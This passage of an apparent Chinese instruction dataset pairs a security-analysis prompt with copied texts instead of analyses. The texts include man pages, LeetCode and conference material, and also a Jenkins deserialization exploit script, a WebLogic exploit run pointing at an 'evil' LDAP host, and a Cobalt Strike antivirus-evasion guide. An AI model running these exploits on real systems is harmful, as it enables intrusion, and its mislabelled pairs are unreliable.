Digital I/O pins  6 are PWM Pins  6 Analog pins  32 KB Flash  16 MHz *Image source  Wikipedia.org Arduino What else is an Arduino?  Since its open source hardware there are many other versions of Arduino compatible boards  Some boards are only IDE compatible, others are also pin compatible Other Arduinos  Arduino Mega  Sparkfuns Arduino Pro and Mini  Evil Mad Scientist Diavolino  Fio  Teensy  Freeduino  Seeeduino  Lilypad  Ardweeny  Bare bones Arduino IDE Syntax Highlighting Compiles Code Uploads to the Arduino Serial console Arduino Speak  Shield  componets that fit on top of an Arduino  Sketch  Arduino code  .pde  Arduino code file type Arduino Language  Like C, but simpler  Has methods for common tasks such as reading and writing to pins, serial, etc.  Relatively easy to inc", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" auto-generated by docbook2man-spec $Revision: 1.1 $ .TH \"SET CONSTRAINTS\" \"7\" \"2003-11-02\" \"SQL - Language Statements\" \"SQL Commands\" .SH NAME SET CONSTRAINTS \\- 设置当前事务的约束模式 .SH SYNOPSIS .sp .nf SET CONSTRAINTS { ALL | \\fIname\\fR [, ...] } { DEFERRED | IMMEDIATE } .sp .fi .SH \"DESCRIPTION 描述\" .PP \\fBSET CONSTRAINTS\\fR 设置当前事务里的约束运算的特性 在 IMMEDIATE 模式下约束是在每条语句后面进行检查的 在 DEFERRED 模式下一直到事务提交时才检查约束 .PP 在你把约束的模式修改成 IMMEDIATE 之后新的约束模式是反作用式地生效的 任何尚在等待的需要在事务结束检查地数据修改的约束在使用 DEFERRED 的时候都将在执行 SET CONSTRAINTS 命令的时候马上检查 .PP 从创建的时候开始一个约束总是表现为下面三个特性之一 INITIALLY DEFERRED, INITIALLY IMMEDIATE DEFERRABLE, 或 INITIALLY IMMEDIATE NOT DEFERRABLE 第三个特性不会受 SET CONSTRAINTS影响 .PP 目前只有外键约束被这个设置影响检查和唯一约束总是立即检查的而不是可推迟的 .SH \"NOTES 注意\" .PP 这个命令只在当前事务里修改约束的行为因此如果你在事务块外面 BEGIN/COMMIT 对执行这个命令 它将显得没有任何作用那样如果你希望不在每个事务中发出 SET CONSTRAINTS 也能修改约束的行为 那么在创建这些约束的时候声明 INITIALLY DEFERRED 或者 INITIALLY IMMEDIATE .SH \"COMPATIBILITY 兼容性\" .PP 这条命令与 SQL 标准里定义的行为兼容只不过在 PostgreSQL 里它只适用于外键约束 .SH \"译者\" .B Postgresql 中文网站 .B 何伟平 <laser@pgsqldb.org>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n2007 年駭客年會徵求論文 HIT 2007 Call For Paper  時間2007 年 7 月 21 日~22 日星期六星期日  主辦單位CHROOT  Security Research Group (http://www.chroot.org)  活動網址http://hitcon.org 台灣第三屆駭客年會將於 2007 年 7 月 21~22 日週六日舉行歡迎各界人士踴躍 投稿論文內容以探討實作技術並能演講 50 分鐘為佳 為了讓會議主題能夠明確我們擬定了以下議題有興趣的朋友可以從下列議題中選 擇自己擅長的方面進行準備(包括論文程式碼和投影片)但不以下列的議題為限今年 特別歡迎各項有關 Windows Vista 作業系統的安全技術探討 1. Exploit technique 對於網路作業系統和應用程式等各方面攻擊程式或手法的技術研究 2. Honeypot 構建安全的 Honeynet 系統對各種入侵進行詳細的技術分析瞭解攻擊者行為和 攻擊手法等或者對於 Honeypot 進行反追蹤技術的探討 3. Virus and anti-virus 電腦病毒和防毒軟體新趨勢或研究 4. Reverse engineering 對二進位檔或者不明資料進行詳細解析構建反向工程的具體過程和方法 5. Audit software vulnerability 對開放原始碼的軟體進行安全性檢測與分析的具體過程和方法或是對商業軟體所 進行的安全性分析 6. Backdoor and rootkit 各種新型態的後門或木馬的設計研究或是檢查方式 7. Web and database security 各種網頁網站軟體和資料庫的安全性探討 8. Firewall, WAF, IDS and IDP 防火牆(Firewall)入侵偵測(防禦)系統(IDSIDP)等的技術現狀和發展前景入侵 檢測系統在現階段的實際應用情況等此外歡迎近年來對於加強 Web 應用程式 安全的 WAF (Web Application Firewall)的各項技術研究 9. Hardened system 對各種當前各種作業系統進行安全加強提升不同安全級別方法技術發展方向 等 10. Covert Channel 隱藏傳輸通道將某特定的資料隱藏包裝於其它正常的資料串流或協定中進行傳 送 論文可選中文或英文撰寫 每文第一頁必須包含題目作者聯絡人演講者及聯 絡資料(電話電子郵件)等並以 PDF 檔格式於 2007 年 6 月 15 日前利用電子 郵件附帶傳送檔案至 hit2007@hitcon.org 為鼓勵投稿本次會議將致贈每篇被接受之論文 NT $3,000 元整 此外大會將依 作者意願將論文或演講內容以電子或書面媒體方式散佈 除了上述的論文徵求外本次駭客年會計畫了一場 0-day exploit 展示只要在 2006 年 7 月 15 日前將您個人所發現的漏洞(未公開且尚未被修正)以電子郵件方 式傳送至 hit2007@hitcon.org經過確認就有機會免費取得本屆駭客年會的入場券 並且上台展示漏洞", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nJenkins 历史RCE漏洞梳理 环境下载修改中间版本号从下载任意版本 https://updates.jenkins-ci.org/download/war/2.31/jenkins.war https://get.jenkins.io/war/2.302/jenkins.war Jenkins 中 java 版本的使情况 1.612 以后是 java 7 2.54 之后是 java 8 2.164 之后是 java 8 或者 java 11 https://github.com/gquere/pwn_jenkins 相对较全的 jenkins 总结 Jenkins 的三种模式 1. Full Access 在该全权限下可以对 Jenkins 做任何事情所以我们可以直接通过 Script Console 来利 Goroovy 进代码执 但是这种情况较少 http://localhost:8080/jenkins/script print \"whoami\".execute().text 2. Read-only Mode 可在全局安全策略中进设置设置之后那么匿名者也能看到些作志job/node 等敏感信息 3. Authenticated Mode 该模式下必须要通过有效的账号密码才能看到 Jenkins 的信息以及任何操作 [常]CVE-2015-8103 反序列化远程代码执 影响版本 该漏洞不需要户进登陆危害较但是命令执是否成功需要借助 dnslog 外带的式来实现我直接反弹 shell.... Jenkins <= LTS 1.625.1 Jenkins <= 1.637 漏洞利 poc #!/usr/bin/python #usage: ./jenkins.py host port /path/to/payload import socket import sys import requests import base64 host = sys.argv[1] port = sys.argv[2] #Query Jenkins over HTTP to find what port the CLI listener is on r = requests.get('http://'+host+':'+port) if 'X-Jenkins-CLI-Port' in r.headers: cli_port = int(r.headers['X-Jenkins-CLI-Port']) elif 'X-Jenkins-CLI-Port' in r.headers: cli_port = int(r.headers['X-Jenkins-CLI2-Port']) else: print \"No CLI Port found in headers\" sys.exit(-1) #Open a socket to the CLI port sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_address = (host, cli_port) print 'connecting to %s port %s' % server_address sock.connect(server_address) # Send headers headers='\\x00\\x14\\x50\\x72\\x6f\\x74\\x6f\\x63\\x6f\\x6c\\x3a\\x43\\x4c\\x49\\x2d\\x63\\x6f\\x6e\\x6e\\x 65\\x63\\x74' print 'sending \"%s\"' % headers sock.send(headers) data = sock.recv(1024) print >>sys.stderr, 'received \"%s\"' % data #data = sock.recv(1024) #print >>sys.stderr, 'received \"%s\"' % data payloadObj = open(sys.argv[3],'rb').read() payload_b64 = base64.b64encode(payloadObj) payload='\\x3c\\x3d\\x3d\\x3d\\x5b\\x4a\\x45\\x4e\\x4b\\x49\\x4e\\x53\\x20\\x52\\x45\\x4d\\x4f\\x54\\x49\\x 4e\\x47\\x20\\x43\\x41\\x50\\x41\\x43\\x49\\x54\\x59\\x5d\\x3d\\x3d\\x3d\\x3e'+payload_b64+'\\x00\\x00\\x 00\\x00\\x11\\x2d\\xac\\xed\\x00\\x05", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1560-001-win-通过winrar压缩数据 ## 来自ATT&CK的描述 攻击者可以使用第三方工具压缩或加密之前收集的数据存在许多可以压缩数据的实用程序包括7-ZipWinRAR和WinZip大多数实用程序都包含加密或压缩数据的功能 可能已预先安装了一些第三方工具例如tar在Linux和macOS或zipWindows系统上 ## 测试案例 windows下安装winrar程序通过winrar命令行的方式进行数据压缩 winrar相关命令解释可参考官方解释说明 ## 检测日志 windows 安全日志 ## 测试复现 ```yml C:\\Users\\Administrator>winrar a C:\\Users\\Administrator\\qax.rar C:\\Users\\Administrator\\qax.pst # 注意如果在使用winrar命令提示winrar不是内部或外部命令也不是可运行的程序或批处理文件请记得添加环境变量 ``` ## 测试留痕 windows 安全日志进程创建命令行参数等 ```yml 已创建新进程 创建者主题: 安全 ID: QAX\\Administrator 帐户名: Administrator 帐户域: QAX 登录 ID: 0x7169C 目标主题: 安全 ID: NULL SID 帐户名: - 帐户域: - 登录 ID: 0x0 进程信息: 新进程 ID: 0xe20 新进程名称: C:\\Program Files\\WinRAR\\WinRAR.exe 令牌提升类型: %%1936 强制性标签: Mandatory Label\\High Mandatory Level 创建者进程 ID: 0x378 创建者进程名称: C:\\Windows\\System32\\cmd.exe 进程命令行: winrar a C:\\Users\\Administrator\\qax.rar C:\\Users\\Administrator\\qax.pst ``` ## 检测规则/思路 ### sigma规则 ```yml title: windows-winrar压缩数据 description: windows server 2016模拟测试攻击者通过winrar压缩收集到的数据 tags: T1560-001 status: experimental author: 12306Bro logsource: product: windows service: security detection: selection: EventID: 4688 #已创建新的进程 Newprocessname: '*RAR.exe' #进程信息>新进程名称 Processcommandline: 'a' #进程信息>进程命令行 condition: selection level: medium ``` ## 建议 可以通过进程监视和监视已知压缩程序的命令行参数来检测可能存在于系统中的攻击者利用压缩程序压缩数据文件的行为这可能会产生大量的良性事件具体取决于环境中系统的使用方式 ## 参考推荐 MITRE-ATT&CK-T1560-001 <https://attack.mitre.org/techniques/T1560/001/> windows 命令行中使用winrar <https://blog.csdn.net/findmyself_for_world/article/details/39292181> 利用WinRAR命令行压缩文件或文件夹 <https://www.cnblogs.com/xzlive/p/10508940.html>", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nVul of PostpreSqlInformic JDBC Driver 当程序中JDBC 连接 URL 可控时可能会造成安全问题HITB2021SIN 中的分享议题 \"Make JDBC Attacks Brilliant Again\" 列举出了H2IBM DB2MODEShapeApache Derby SQLite等数据库Driver在Connect URL可控情况下的安全问题 Postgresql CVE-2022-21724 近披露了CVE-2022-21724同样是在JDBC Connection URL可控情况下将会出现某些安 全问题 当攻击者控制 jdbc url 或属性时使 postgresql 库的系统将受到攻击pgjdbc 根据通过 `authenticationPluginClassName``sslhostnameverifier``socketFactory``sslfactory` `sslpasswordcallback` 连接属性提供的类名实例化插件实例但是驱动程序在实例化类之前 没有验证类是否实现了预期的接这可能导致通过任意类加载远程代码执 1.复现 Github提供POC如下 可以看到是利了Spring中的 org.springframework.context.support.ClassPathXmlApplicationContext类这搭建环境参 考Spring Boot Connect to PostgreSQL Database Examples 测试Demo DriverManager.getConnection(\"jdbc:postgresql://node1/test?socketFactory=org. package com.example.demo; /** * @auther Skay * @date 2022/2/18 0:18 * @description */ import org.springframework.beans.factory.annotation.Autowired; import org.springframework.boot.CommandLineRunner; import org.springframework.boot.SpringApplication; import org.springframework.boot.autoconfigure.SpringBootApplication; import org.springframework.jdbc.core.BeanPropertyRowMapper; import org.springframework.jdbc.core.JdbcTemplate; import java.sql.Types; import java.util.List; import java.util.Map; @SpringBootApplication public class SpringJdbcTemplate2PostgreSqlApplication implements CommandLine 1 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 application.propertise 2.分析 简单看下代码逻辑 org.postgresql.Driver#makeConnection 进org.postgresql.jdbc.PgConnection类初始化逻辑 > oorg.postgresql.jdbc.PgConnection#PgConnection > org.postgresql.core.ConnectionFactory#openConnection > org.postgresql.core.v3.ConnectionFactoryImpl#openConnectionImpl 这会进关键法org.postgresql.core.SocketFactoryFactory#getSocketFactory @Autowired private JdbcTemplate jdbcTemplate; public static void main(String[] args) { SpringApplication.run(SpringJdbcTemplate2PostgreSqlApplication.class } @Override public void run(String... args) throws Exception { Map<String, Object> map = jdbcTemplate.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nAutomated Malware Similarity Analysis Daniel Raygoza daniel@raygoza.net Abstract Malware analysis has evolved in both the sophistication of the samples analyzed and the tools of the trade. Unfortunately human analysis of samples is still very expensive and time consuming. As teams of malware analysts have grown larger, the duplication of effort in analyzing similar pieces of code has also grown. The goal of this paper is to outline a simple framework that could be used to help remedy this situation, ultimately saving time and money for organizations performing malware analysis. The author is aware of similar proprietary and commercial products that aim to resolve this issue or similar issues, however he is not aware of any free tools that attempt to reduce redundant analysis. Introduction The initial approach for this project is very simple, and is designed to be as unobtrusive to an analysts typical workflow as possible. All samples arrive into the system via a designated drop box, be it a file share or other method. The samples are disassembled and their functions are stored as individual bytestreams along with other additional information. This information is then passed to a central server that handles the indexing of this data and the similarity scoring between a given sample and every other sample in the system. Because similarity scoring occurs at the function level, it is straightforward for an analyst to quickly identify which individual functions of belonging to two samples contribute to their similarity. It should also be fairly easy to add additional algorithms in the future to support more complex similarity scoring. The goal is not to simply state that two samples are similar, but also help analysts to identify which of their components make them similar. In doing so an analyst is easily able to identify which code may need additional scrutiny without duplicating work. This system has not been designed to support the classification of malware into fami", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Weblogic未授权远程代码执行漏洞 (CVE-2023-21839) Oracle WebLogic Server是业界领先的应用程序服务器用于使用Java EE标准构建企业应用程序并以低拥有成本将其部署在可靠可扩展的运行时 在 [Oracle 2023年1月安全公告日](https://www.oracle.com/security-alerts/cpujan2023.html) 修复了这个漏洞 CVE-2023-21839 允许远程用户在未经授权的情况下通过 IIOP/T3 进行 JNDI lookup 操作当 JDK 版本过低或本地存在小工具javaSerializedData时这可能会导致 RCE 漏洞 参考: - https://www.oracle.com/security-alerts/cpujan2023.html ## 环境设置 执行以下命令启动 Weblogic server 12.2.1.3 ``` docker compose up -d ``` 启动完成后访问`http://your-ip:7001/console`可以看到管理界面 ## 复现 https://github.com/4ra1n/CVE-2023-21839 ```shell cd cmd go build -o CVE-2023-21839 ./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil ``` Windows ```shell cd cmd go build -o CVE-2023-21839.exe CVE-2023-21839.exe -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil ``` DNS Log ```shell CVE-2023-21839.exe -ip 192.168.25.129 -port 7001 -ldap ldap://kmi896.dnslog.cn/test [*] your-ip: 192.168.25.129 [*] your-port: 7001 [*] your-ldap: ldap://kmi896.dnslog.cn/test [*] weblogic 12 [*] id=2 LocateRequest [*] id=3 RebindRequest [*] id=4 RebindRequest [*] id=5 LocateRequest [*] id=6 ResolveRequest [*] id=7 ResolveRequest ``` ![](1.png)", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# BSidesTLV 2019 CTF Various writeups for the [2019 BSidesTLV CTF](https://ctf19.bsidestlv.com). Participated as part of the [JCTF team](https://jctf.team/), which came in second: ![](images/scoreboard.png) It was a battle right to the end. Personally I really enjoyed [DoSaTTaCK](DoSaTTaCK.md), it would be really nice to see more DOS based challenges in CTFs.", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Leetcode 题解 - 搜索 <!-- GFM-TOC --> * [Leetcode 题解 - 搜索](#leetcode-题解---搜索) * [BFS](#bfs) * [1. 计算在网格中从原点到特定点的最短路径长度](#1-计算在网格中从原点到特定点的最短路径长度) * [2. 组成整数的最小平方数数量](#2-组成整数的最小平方数数量) * [3. 最短单词路径](#3-最短单词路径) * [DFS](#dfs) * [1. 查找最大的连通面积](#1-查找最大的连通面积) * [2. 矩阵中的连通分量数目](#2-矩阵中的连通分量数目) * [3. 好友关系的连通分量数目](#3-好友关系的连通分量数目) * [4. 填充封闭区域](#4-填充封闭区域) * [5. 能到达的太平洋和大西洋的区域](#5-能到达的太平洋和大西洋的区域) * [Backtracking](#backtracking) * [1. 数字键盘组合](#1-数字键盘组合) * [2. IP 地址划分](#2-ip-地址划分) * [3. 在矩阵中寻找字符串](#3-在矩阵中寻找字符串) * [4. 输出二叉树中所有从根到叶子的路径](#4-输出二叉树中所有从根到叶子的路径) * [5. 排列](#5-排列) * [6. 含有相同元素求排列](#6-含有相同元素求排列) * [7. 组合](#7-组合) * [8. 组合求和](#8-组合求和) * [9. 含有相同元素的组合求和](#9-含有相同元素的组合求和) * [10. 1-9 数字的组合求和](#10-1-9-数字的组合求和) * [11. 子集](#11-子集) * [12. 含有相同元素求子集](#12-含有相同元素求子集) * [13. 分割字符串使得每个部分都是回文数](#13-分割字符串使得每个部分都是回文数) * [14. 数独](#14-数独) * [15. N 皇后](#15-n-皇后) <!-- GFM-TOC --> 深度优先搜索和广度优先搜索广泛运用于树和图中但是它们的应用远远不止如此 ## BFS <div align=\"center\"> <img src=\"https://cs-notes-1256109796.cos.ap-guangzhou.myqcloud.com/95903878-725b-4ed9-bded-bc4aae0792a9.jpg\"/> </div><br> 广度优先搜索一层一层地进行遍历每层遍历都是以上一层遍历的结果作为起点遍历一个距离能访问到的所有节点需要注意的是遍历过的节点不能再次被遍历 第一层 - 0 -\\> {6,2,1,5} 第二层 - 6 -\\> {4} - 2 -\\> {} - 1 -\\> {} - 5 -\\> {3} 第三层 - 4 -\\> {} - 3 -\\> {} 每一层遍历的节点都与根节点距离相同设 d<sub>i</sub> 表示第 i 个节点与根节点的距离推导出一个结论对于先遍历的节点 i 与后遍历的节点 j有 d<sub>i</sub> <= d<sub>j</sub>利用这个结论可以求解最短路径等 **最优解** 问题第一次遍历到目的节点其所经过的路径为最短路径应该注意的是使用 BFS 只能求解无权图的最短路径无权图是指从一个节点到另一个节点的代价都记为 1 在程序实现 BFS 时需要考虑以下问题 - 队列用来存储每一轮遍历得到的节点 - 标记对于遍历过的节点应该将它标记防止重复遍历 ### 1. 计算在网格中从原点到特定点的最短路径长度 1091\\. Shortest Path in Binary Matrix(Medium) [Leetcode](https://leetcode.com/problems/shortest-path-in-binary-matrix/) / [力扣](https://leetcode-cn.com/problems/shortest-path-in-binary-matrix/) ```html [[1,1,0,1], [1,0,1,0], [1,1,1,1], [1,0,1,1]] ``` 题目描述0 表示可以经过某个位置求解从左上角到右下角的最短路径长度 ```java public int shortestPathBinaryMatrix(int[][] grids) { if (grids == null || grids.length == 0 || grids[0].length == 0) { return -1; } int[][] direction = {{1, -1}, {1, 0}, {1, 1}, {0, -1}, {0, 1}, {", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n.\\\" DO NOT MODIFY THIS FILE! It was generated by help2man 1.48.5. .\\\"******************************************************************* .\\\" .\\\" This file was generated with po4a. Translate the source file. .\\\" .\\\"******************************************************************* .TH YES 1 2022年9月 \"GNU coreutils 9.1\" 用户命令 .SH 名称 yes \\- 不断输出一个字符串直到被杀死为止 .SH 概述 \\fByes\\fP [\\fI\\,字符串\\/\\fP]... .br \\fByes\\fP \\fI\\,选项\\/\\fP .SH 描述 .\\\" Add any additional description here .PP 不断输出包括所有指定字符串的一行或者是 'y' .TP \\fB\\-\\-help\\fP 显示此帮助信息并退出 .TP \\fB\\-\\-version\\fP 显示版本信息并退出 .SH 作者 由 David MacKenzie 编写 .SH 报告错误 GNU coreutils 的在线帮助 <https://www.gnu.org/software/coreutils/> .br 请向 <https://translationproject.org/team/zh_CN.html> 报告翻译错误 .SH 版权 Copyright \\(co 2022 Free Software Foundation, Inc. License GPLv3+: GNU GPL version 3 or later <https://gnu.org/licenses/gpl.html>. .br This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. .SH 参见 完整文档请见 <https://www.gnu.org/software/coreutils/yes> .br 或者在本地使用 info \\(aq(coreutils) yes invocation\\(aq", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBlue Team Hell: A story of ISPs, Healthcare, and Education Text Amanda Berlin @Infosystir Blue team started at ISPs Healthcare Purple team Windows Admin Network Security Jack of all trades very visual - All the memes!! Text Hot sauce for charity thats not Charity Text Adult Supervision Required If youre squeamish you might want to look away and maybe do the earmuffs thing Text Blue & Red One of my favorite kids movies ever. Great quote that applies to defense and offense 1. preface with that all Im bringing up has been engineered and fixed or I wouldnt bring it up. 2.Imagine yourself walking into this environment with no help (at first) 3.Hadnt started in infosec yet 4.Knew these were bad, and it got worse 5.Guy didnt grow with the environment 6.Started out with everyone in the dept as a domain admin and non-dept people knowing INFO 7.Start with some things we didnt have 1. A/V - production servers had anti-virus installed sometimes. But if it were to cause performance problems it would be uninstalled or disabled. Servers that were required to remain logged in with domain admin due to the way the application interacted with the desktop. 2. WSUS. All windows environment. WSUS was there, just not really operational or managed. 3. Visibility. No clue what software, how many servers/switches/pcs. What vendor equipment was on our network, what data was passing over it. 4. decent datacenter (waterlines above, open ports, door access, cable mgmt) pictures of server racks here 1. backups 2. DMZ 3. segmentation, open ports and vlan1 everywhere! 4. At one point this was so incredibly bad. That our public facing web server was on a dual homed windows 2003 server. This Windows server had a database backend that our third party web developers would access with vnc. The database was on microsoft sql 2000 located on our domain controller. These same domain controllers contained the dhcp zones for our publicly accessible non-password protected, unencrypted wifi. Once we had an issue wit", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBuilding SECURE SERVERS with LINUX TOOLS & BEST PRACTICES FOR BASTION HOSTS MICHAEL D. BAUER Building SECURESERVERS with LINUX Michael D. Bauer Beijing  Cambridge  Farnham  Köln  Paris  Sebastopol  Taipei  Tokyo TITLE Page iii Wednesday, October 16, 2002 6:14 PM This is the Title of the Book, eMatter Edition Copyright  2002 OReilly & Associates, Inc. All rights reserved. 323 Chapter 10 CHAPTER 10 System Log Management and Monitoring Whatever else you do to secure a Linux system, it must have comprehensive, accu- rate, and carefully watched logs. Logs serve several purposes. First, they help us trou- bleshoot virtually all kinds of system and application problems. Second, they provide valuable early-warning signs of system abuse. Third, after all else fails (whether that means a system crash or a system compromise), logs can provide us with crucial forensic data. This chapter is about making sure your system processes and critical applications log the events and states youre interested in and dealing with this data once its been logged. The two logging tools well cover are syslog and the more powerful Syslog-ng (syslog new generation). In the monitoring arena, well discuss Swatch (the Simple Watcher), a powerful Perl script that monitors logs in real time and takes action on specified events. syslog syslog is the tried-and-true workhorse of Unix logging utilities. It accepts log data from the kernel (by way of klogd), from any and all local process, and even from pro- cesses on remote systems. Its flexible as well, allowing you to determine what gets logged and where it gets logged to. A preconfigured syslog installation is part of the base operating system in virtually all variants of Unix and Linux. However, relatively few system administrators custom- ize it to log the things that are important for their environment and disregard the things that arent. Since, as few would dispute, information overload is one of the major challenges of system administration, this i", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# Kubernetes > Kubernetes is an open-source container-orchestration system for automating application deployment, scaling, and management. It was originally designed by Google, and is now maintained by the Cloud Native Computing Foundation. ## Summary - [Tools](#tools) - [Container Environment](#container-environment) - [Information Gathering](#information-gathering) - [RBAC Configuration](#rbac-configuration) - [Listing Secrets](#listing-secrets) - [Access Any Resource or Verb](#access-any-resource-or-verb) - [Pod Creation](#pod-creation) - [Privilege to Use Pods/Exec](#privilege-to-use-pods-exec) - [Privilege to Get/Patch Rolebindings](#privilege-to-get-patch-rolebindings) - [Impersonating a Privileged Account](#impersonating-a-privileged-account) - [Privileged Service Account Token](#privileged-service-account-token) - [Interesting endpoints to reach](#interesting-endpoints-to-reach) - [API addresses that you should know](#api-addresses-that-you-should-know) - [References](#references) ## Tools * [kubeaudit](https://github.com/Shopify/kubeaudit) - Audit Kubernetes clusters against common security concerns * [kubesec.io](https://kubesec.io/) - Security risk analysis for Kubernetes resources * [kube-bench](https://github.com/aquasecurity/kube-bench) - Checks whether Kubernetes is deployed securely by running [CIS Kubernetes Benchmark](https://www.cisecurity.org/benchmark/kubernetes/) * [kube-hunter](https://github.com/aquasecurity/kube-hunter) - Hunt for security weaknesses in Kubernetes clusters * [katacoda](https://katacoda.com/courses/kubernetes) - Learn Kubernetes using interactive broser-based scenarios * [kubescape](https://github.com/armosec/kubescape) - Automate Kubernetes cluster scans to identify security issues ## Container Environment Containers within a Kubernetes cluster automatically have certain information made available to them through their [container environment](https://kubernetes.io/docs/concepts/containers/container-environment/). Additional ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nC2profile中的magic_mz_x86和magic_mz_x64 0x00 前言 周末写一个在线工具后面会发布的看见C2profile中magic_mz_*配置项于是搜了搜发现没有 人写关于这个打算这周写个文档发星球哪知道周一看twitter发现有同学抢先一步发了卷阿太 卷了不过我还是要写他文章中有一些笔误https://www.redteam.cafe/red-team/shellcode-inject ion/magic_mz_x86-and-magic_mz_x64 这个功能是4.2以后加入的不是 2.4.3 dec abp应该是dec ebp 都是笔误无伤大雅可能一些新手同学会出问题所以我在这儿先指出来回归正题这2个配置有什 么用 0x01 使用 magic MZ是PE结构的前2个字节标志着这是一个PE文件和图片文件头压缩文件头一个意思这 个值是固定的4D 5A我们使用cobaltstrike的时候看过我前面文章关于cs payload加载的同学应该知 道植入体最后都是使用的beacon.dll这是一个反射dll默认是以4d 5a 52 45开头的beacon.dll一 般是不落地的在内存中杀毒软件会通过这个头在内存中定位我们的样本因此我们修改这个头可 以达到一定的逃逸作用 首先我们看看官方解释https://www.cobaltstrike.com/help-malleable-postex 覆盖我们Beacon反射dll的4D 5A 52 45 需要根据架构不同编写指令 不能是随便的数据去覆盖必须是有效的指令但是这个指令也不能瞎操作 前2条应该好懂最后一条是指令还不能瞎操作这个怎么弄举个例子 a+1-1 = a我们进行了一次加法操作和一次减法操作但是结果不变懂了吧 0x02 实操 这涉及到汇编指令了我详细写操作让新手同学学几条指令也能使用cs这个配置而不必担心不会 汇编 我们先下载编译工具nasm地址https://www.nasm.us/ 然后编写如下代码这个是官方给的默认值MZRE Author: L.N. / Date: 2021-08-24 Produced by AttackTeamFamily No. 1 / 4 - Welcome to www.red-team.cn 使用notepad++打开x86文件 然后我们把这个值填入magic_mz_x86配置中 明白了原理我们实际操作起来我列出了一些两两一组的指令记住操作过去再操作回来就行了 自己也可以去翻翻指令学习下自己想一个方法 bits 32 ;指定32位程序也就是x86架构 section .text ;声明代码段 global _start ;指定入口函数 _start: ; dec ebp ;减1 pop edx ;出栈 push edx ;入栈 inc ebp ;加1 set magic_mz_x86 \"MZRE\"; bits 32 ;指定32位程序也就是x86架构 section .text ;声明代码段 global _start ;指定入口函数 _start: ; dec ebp ;减1 inc ebp ;加1 inc eax dec eax Author: L.N. / Date: 2021-08-24 Produced by AttackTeamFamily No. 2 / 4 - Welcome to www.red-team.cn 0x03 测试 我们分别编译上面x86和x64的汇编编译结果如下使用notepad++的hexeditor插件查看 上面是结果很多字符是不可见字符这个没关系CS配置文件支持16进制 最后我们生成stageless的raw格式的代码看看 但是上线发现x64的不能上线最后查看报错是DOS头太长了我们使用c2lint检测PS使用 c2profile前一定要使用c2lint检测 not ebx ;取反 not ebx push edx ;入栈 pop edx ;出栈 XCHG eax,ebx ;交换 XCHG eax,ebx ;各位自己随机组合 bits 64 section .text global _start _start: pop r9 push r9 inc r8 dec r8 not r10 not r10 XCHG eax,ebx XCHG eax,ebx Author: L.N. / Date: 2021-08-24 Produced by AttackTeamFamily No. 3 / 4 - Welcome to www.red-team.cn 最后验证出 x86最大长度是27个字节 x64最大程度是12个字节 最后减少点x64的指令就能上线成功 0x04 总结 cs有很多细节需", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1202-win-间接命令执行-基于Explorer.exe执行payload(白名单) ## 来自ATT&CK的描述 可以使用各种Windows实用程序来执行命令而不需要调用cmd例如Forfiles程序兼容性助手pcalua.exeWSLWindowsSubsystem for Linux组件以及其他实用程序可以从命令行界面运行窗口或通过脚本来调用程序和命令的执行 攻击者可能会滥用这些功能来规避防御尤其是在破坏检测和/或缓解控制如组策略的同时执行任意动作这些控制限制/阻止了cmd或恶意负载相关文件扩展名的使用 ## 测试案例 Explorer.exe用于在Windows中管理文件和系统组件的二进制文件 路径 ``` C:\\Windows\\explorer.exe C:\\Windows\\SysWOW64\\explorer.exe ``` 使用从explorer.exe的新实例生成的父进程执行calc.exe ```bash explorer.exe /root,\"C:\\Windows\\System32\\calc.exe\" ``` 用例在explorer父进程破坏进程树的情况下执行指定文件可用于防御规避 所需权限 用户 操作系统Windows XPWindows 7Windows 8Windows 8.1Windows 10 使用从explorer.exe的新实例生成的父进程执行notepad.exe ```bash explorer.exe C:\\Windows\\System32\\notepad.exe ``` 用例在explorer父进程破坏进程树的情况下执行指定文件可用于防御规避 所需权限用户 操作系统Windows 10已测试 ## 检测日志 windows 安全日志需要自行配置 ## 测试复现 ```bash C:\\Users\\liyang\\Desktop\\asptest>explorer.exe /root,\"C:\\Windows\\System32\\calc.exe\" C:\\Users\\liyang\\Desktop\\asptest>explorer.exe C:\\Windows\\System32\\notepad.exe ``` ## 测试留痕 ```log ``` ## 检测规则/思路 这里参看Sigma官方规则 ```yml title: Explorer Root Flag Process Tree Break id: 949f1ffb-6e85-4f00-ae1e-c3c5b190d605 description: Detects a command line process that uses explorer.exe /root, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer status: experimental references: - 